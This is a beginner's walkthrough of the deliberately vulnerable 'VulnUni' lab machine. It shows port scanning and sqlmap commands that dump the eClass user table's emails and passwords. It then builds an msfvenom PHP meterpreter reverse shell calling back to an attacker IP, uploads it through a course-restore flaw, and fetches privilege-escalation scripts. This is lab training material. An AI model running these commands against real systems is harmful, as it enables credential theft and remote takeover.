VulnUni
Get it at VulnUni: 1.0.1
The machine is classified as easy, so a good starting point.
My first machine after a few years and the main problem was to setup my lab. Long story short, I ended up with a Kali image I imported to Virtualbox. In the past I had never so much errors with installing Kali linux.
I try to document the relevant steps like my first try for the OSCP exam. So lets get into the server:
At first we need to know the IP address which is quite simple in your LAN but we can check with netdiscover or nmap.
One of the first things I did in the past is full portscan with nmap:
nmap -A -p- 192.168.178.47
Nmap shows us only port 80 is open and an apache webserver is running on it.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 23:14 BST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.04% done; ETC: 23:16 (0:01:31 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.61% done; ETC: 23:16 (0:01:29 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.81% done; ETC: 23:16 (0:01:28 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.99% done; ETC: 23:16 (0:01:27 remaining)
Nmap scan report for vulnuni.fritz.box (192.168.178.47)
Host is up (0.011s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni – We train the top Information Security Professionals Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.26 seconds
My thought for the web server was to start with Burp as this is one of the tools I used in the past very often for websites. Unfortunately the public version is without any function and so I tested the tool ZAP.
We need the IP and then click on attack
ZAP discovered a lot of pages but I tried to get some more with the Dirbuster option
As lot of the pages link to vulnuni.local, I modified my /etc/hosts/ file so my sessions are routed to the virtual machine.
I found an application called “eClass” and after some clicks a login page https://vulnuni.local/vulnuni-eclass/index.php
A Google search about this tool shows two exploits:
The first one needs an active account but the second one don’t need ac account so I started with this exploit. With ZAP you are able to set breakpoints for every request under Tools -> Toggle Break on All Request. Now enter some values into the login form and click enter. In ZAP you will see the request you just made:
Now we need to save the request. Right-Click on the intercepted request and then choose Save Raw -> Request -> All
For the next step, open a terminal and paste the line into:
sqlmap -r eclasslogin.raw –level=5 –risk=3 -v
The exploit description is pretty good! Sqlmap will ask some questions which can all answered with Yes. After a while the following output is presented:
Now we can work with the session sqlmap stores for us:
- sqlmap -r eclasstestlogin -v –current-db [Result is eclass]
- sqlmap -r eclasslogin.raw -v -D eclass -T user -C username,email,password –dump [this get the columns password and email from the table user]
To get the tables and columns we need to iterate through the database but I skipped this here. a good tutorial can be found here: https://www.binarytides.com/sqlmap-hacking-tutorial/
After a while we get the accounts which are already registered with the information we requested:
Sqlmap also stores the result in a csv so no need to copy the terminal output.
Now we have an account and we can start with the next steps.
Remember the other exploit I listed above. It tells us how to upload files to the system. So I tried the following:
Create a PHP meterpreter reverse shell:
# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.178.50 LPORT=12000 -f raw > shell.php
# cat shell.php | pbcopy && echo ‘ shell.php && pbpaste >> shell.php
Next we need to open a handler
- Start msfconsole
- use exploit/multi/handler
- set PAYLOAD php/meterpreter_reverse_tcp
- set LHOST (Your attackers IP)
- set LPORT (The same port you configured in the webshell, I used 12000)
- exploit
Now upload the shell, compressed in a zip file to the eclass system.
The relevant section from the exploit page:
You have to login to the platform as an administrator or user with admin rights. You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results. Once you have logged in as admin: 1) Navigate to 127.0.0.1/modules/course_info/restore_course.php 2) Upload your .php shell compressed in a .zip file 3) Ignore the error message 4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
The url in my case is then: https://vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/shell12000.php (There is a typo in the description)
Now your meterpreter session should be triggered.
We see that the user is www-data and now we can try to get more information about the system. Remember, we dont have any password from the system users, only from the eclass web application.
A cool script is the linuxprivchecker from this github: https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
To work easier we can open a tty shell with python:
python -c 'import pty; pty.spawn("/bin/sh")'
You can get the scirpt direct into the victim with wget:
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
Then use python ./linuxprivchecker.py. it will produce a lot of information.
Very important is the kernel version. You get it with uname -a:
Linux vulnuni 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Go further and collect more information. You will find the first flag in the home direcgtory which is accessible for our account
Another cool script is linPEAS
I used it and piped the output to a txt-file which is then downloaded with the meterpreter command download.